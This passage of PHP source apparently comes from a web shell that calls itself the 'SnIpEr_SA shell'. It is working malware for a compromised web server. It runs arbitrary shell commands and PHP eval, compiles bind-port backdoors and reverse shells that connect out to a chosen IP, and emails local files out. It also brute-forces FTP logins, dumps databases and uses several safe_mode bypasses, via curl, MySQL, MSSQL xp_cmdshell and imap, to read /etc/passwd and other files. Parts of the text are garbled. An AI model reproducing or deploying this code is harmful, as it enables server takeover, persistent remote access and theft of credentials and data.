"; echo ws(2)."�� : "; echo (($safe_mode)?("��"):("�� ")); echo "".ws(2); echo "�� : ".@phpversion().""; $curl_on = @function_exists('curl_version'); echo ws(2); echo "��: ".(($curl_on)?("��"):("�� ")); echo "".ws(2); echo "�� : "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "��"; } else { echo "�� "; } echo "".ws(2); echo "�� : "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "��";}else{echo "�� ";} echo "".ws(2); echo "�� : "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "��";}else{echo "�� ";} echo "".ws(2); echo "��: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "��";}else{echo "��";} echo "
".ws(2); echo "�� : "; if(''==($df=@ini_get('disable_functions'))){echo "��";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} echo "
".ws(2)."�� : ".view_size($free)." �� : ".view_size($all).""; echo '

'; echo $font; if($unix){ echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
'; echo "

"; echo ""; echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_una me(),0,120)."
")); echo ws(3).$sysctl."
"; echo ws(3).ex('echo $OSTYPE')."
";

echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; if(!empty($id)) { echo ws(3).$id."
"; } else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
'; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"; echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo ""; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
'; echo "

"; echo ""; echo ws(3).@substr(@php_uname(),0,120)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@getenv("USERNAME")."
"; echo ws(3).$dir; echo "
"; } echo ""; echo "

"; if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); err(6+$res); $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && ! empty($_POST['loc_file'])) { if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } else { $filename = @basename($_POST['loc_file']); $filedump = @fread($file,@filesize($_POST['loc_file'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; } if(empty($_POST['from'])) { $_POST['from'] = '[email protected]'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); err(6+$res);

$_POST['cmd']=""; }

} if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; } if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } else { fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']="edit_file"; echo "

".$lang[$language.'_text61']."

"; } } else if($_POST['action'] == "delete") { if(unlink($_POST['mk_name'])) echo "

".$lang[$language.'_text63']."

"; $_POST['cmd']=""; } break; case 'dir': if($_POST['action'] == "create"){ if(mkdir($_POST['mk_name'])) { $_POST['cmd']=""; echo "

2>".$lang[$language.'_text62']."

"; } else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } } else if($_POST['action'] == "delete"){ if(rmdir($_POST['mk_name'])) echo "

".$lang[$language.'_text64']."

"; $_POST['cmd']=""; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && ! empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } else { echo $table_up3; echo $font; echo ""; echo ""; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']); if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } else { if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); @fwrite($file,$_POST['e_text']); @touch($_POST['e_name'],$mtime,$mtime); $_POST['cmd']=""; echo "

".$lang[$language.'_text45']."

"; } } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf("/tmp/bd.c",$port_bind_bd_c);

$blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); $_POST['cmd']="ps -aux | grep bd";

} if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); $_POST['cmd']="ps -aux | grep bdpl"; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); $_POST['cmd']="ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="C")) { cf("/tmp/dpc.c",$datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); $_POST['cmd']="ps -aux | grep dpc"; } if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir']."/".$nfn) or print("

Error uploading file ".$HTTP_POST_FILES['userfile']['name']."

");

} if (!empty($_POST['with']) && !empty($_POST['rem_file']) && ! empty($_POST['loc_file'])) { switch($_POST['with']) { case wget: $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; break; case fetch: $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; break; case lynx: $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; break; case links: $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; break; case GET: $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; break; case curl: $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; break; } } if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } else { if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") {

list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); $_POST['cmd'] = ""; } else if(!$users=get_users()) { echo "

".$lang[$language.'_text96']."

" ; $_POST['cmd'] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } echo $font.$lang[$language.'_text1'].": ".$_POST['cmd'].""; if($safe_mode) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime); } echo "$file\n"; } $d->close(); } else echo $lang[$language._text29]; break; case 'test1': $ci = @curl_init("file://".$_POST['test1_file'].""); $cf = @curl_exec($ci); echo $cf; break; case 'test2': @include($_POST['test2_file']); break;<br /> <br /> case 'test3': if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_ mp']); if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table"); @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )"); @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table"); while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table"); } else echo "[-] ERROR! Can't select database"; @mysql_close($db); } else echo "[-] ERROR! Can't connect to mysql server"; break; case 'test4': if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_ mp']); if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table SnIpEr_SA_temp_table",$db); @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); $res = mssql_query("select * from SnIpEr_SA_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo $row[0]."\r\n"; } @mssql_query("drop table SnIpEr_SA_temp_table",$db); } else echo "[-] ERROR! Can't select database"; @mssql_close($db); } else echo "[-] ERROR! Can't connect to MSSQL server"; break; case 'test5': if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; @mb_send_mail(NULL, NULL, NULL, NULL, $extra); $lines = file ('/tmp/mb_send_mail'); foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } break; case 'test6':<br /> <br /> $stream = @imap_open('/etc/passwd', "", ""); $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; @imap_close($stream); break; case 'test7': $stream = @imap_open($_POST['test7_file'], "", ""); $str = @imap_body($stream, 1); echo $str; @imap_close($stream); break; case 'test8': if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118']; else echo $lang[$language.'_text119']; break; } } else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db _query")&&($_POST['cmd']!="ftp_brute")){ $cmd_rep = ex($_POST['cmd']); if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } else { echo @htmlspecialchars($cmd_rep)."\n"; }} if ($_POST['cmd']=="ftp_brute") { $suc = 0; foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10); if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } @ftp_close($connection); } echo "\r\n-------------------------------------\r\n"; $count = count($users); if(isset($_POST['reverse'])) { $count *= 2; } echo $lang[$language.'_text97'].$count."\r\n"; echo $lang[$language.'_text98'].$suc."\r\n"; } if ($_POST['cmd']=="php_eval"){ $eval = @str_replace("<?","",$_POST['php_eval']); $eval = @str_replace("?>","",$eval); @eval($eval);} if ($_POST['cmd']=="mysql_dump") { if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db'];<br /> <br /> if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }<br /> <br /> else { if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } else { echo "[-] ERROR! Can't write in dump file"; } }<br /> <br /> } echo "
"; echo ""; echo ""; echo ""; function div_title($title, $id) { return ''.$title.''; } function div($id) { if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return ''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ ts; echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).i n('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submi t',0,$lang[$language.'_butt11'])); echo $te.''.$table_end1.$fe; echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3'). $ts; echo sr(15,"".$lang[$language.'_text202'].$arrow."",in('text','snn',85,'/etc/pas

swd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit' ,'submit',0,$lang[$language.'_butt7'])); echo $te.''.$table_end1.$fe; echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3'). $ts; echo sr(15,"".$lang[$language.'_text302'].$arrow."",in('text','SnIpEr_SA',85,'/e tc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('s ubmit','submit',0,$lang[$language.'_butt7'])); echo $te.''.$table_end1.$fe; if($safe_mode){ echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ ts; echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empt y($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action>".ws(3)."<select name=what>".in('hidden','cmd',0,'m k').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1 3'])); echo $te.''.$table_end1.$fe; } if($safe_mode && $unix){ echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ ts; echo sr(15,"".$lang[$language.'_text68'].$arrow."","<select name=what>".ws(2)."".$lang[$language.'_text69'].$arrow." ".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filenam e"))).ws(2)."".$lang[$language.'_text70'].$arrow."".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']): ("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit', 'submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode){ $aliases2 = ''; foreach ($aliases as $alias_name=>$alias_cmd) { $aliases2 .= ""; } echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$t s; echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","<select name=alias>".$aliases2."".in('hidden','dir',0,$dir).ws(4).in('submit','su bmit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ ts; echo

sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text') .ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm ) ".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; if(!$safe_mode && $unix){ echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ ts; echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text') .ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc] ').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden',' dir',0,$dir)); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; echo "

".div('id9').""; echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo "

"; echo $table_end1.$fe; if($safe_mode&&$curl_on) { echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10') .$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!e mpty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','d ir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$langu age.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode) { echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11') .$ts; echo "

"; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!e mpty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','d ir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$langu age.'_butt8'])); echo $te.''.$table_end1.$fe;

} if($safe_mode&&$mysql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12') .$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!emp ty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$languag e.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_ POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."". in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("passwor d"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port', 15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!e mpty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','d ir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$langu age.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$mssql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13') .$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!emp ty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$langua ge.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($ _POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".i n('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password "))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',1 5,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!em pty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$di r).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_but t8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$unix&&function_exists('mb_send_mail')){ echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22' ).$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!e mpty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','d ir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$langu age.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&function_exists('imap_list')){ echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23' ).$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!em

pty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir ).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt 8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&function_exists('imap_body')){ echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24' ).$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!e mpty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','d ir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$langu age.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode) { echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25' ).$ts; echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,( !empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden ','dir',0,$dir).in('hidden','cmd',0,'test8')); echo sr(15,"".$lang[$language.'_text117'].$arrow."",in('text','test8_file2',96,( !empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit',' submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(@ini_get('file_uploads')){ echo ""; echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85,'')); echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('sub mit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode&&$unix){ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15') .$ts; echo sr(15,"".$lang[$language.'_text16'].$arrow."","<select size=\"1\" name=\"with\">".in('hidden','dir',0,$dir).ws(2)."".$lang[$ language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir ).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } echo

$fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16') .$ts; echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).i n('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','s ubmit',0,$lang[$language.'_butt14'])); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none ',1).' '.$arh); echo $te.''.$table_end1.$fe; if(@function_exists("ftp_connect")){ echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts ."".$fs."".$fe.$fs."".$fe."

".$ts; echo "".$lang[$language.'_text87']."
"; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',4 5,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")) )); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!em pty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,( !empty($_POST['ftp_password'])?($_POST['ftp_password']):("[email protected]")))) ; echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!emp ty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftpdir/file"))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir) ); echo sr(25,"".$lang[$language.'_text90'].$arrow."","<select name=ftp_mode>".in(' hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); echo $te."

".$ts; echo "".$lang[$language.'_text100']."
"; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',4 5,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")) )); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!em pty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,( !empty($_POST['ftp_password'])?($_POST['ftp_password']):("[email protected]"))))

; echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir) ); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!emp ty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftpdir/file"))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,"".$lang[$language.'_text90'].$arrow."","<select name=ftp_mode>".in(' hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."

"; } if($unix && @function_exists("ftp_connect")){ echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18') .$ts; echo sr(15,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',8 5,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")) ).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_ butt1'])); echo sr(15,"","".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); echo $te.'

'.$table_end1.$fe; } if(@function_exists("mail")){ echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$t s."".$fs."".$ts; echo "".$lang[$language.'_text103']."
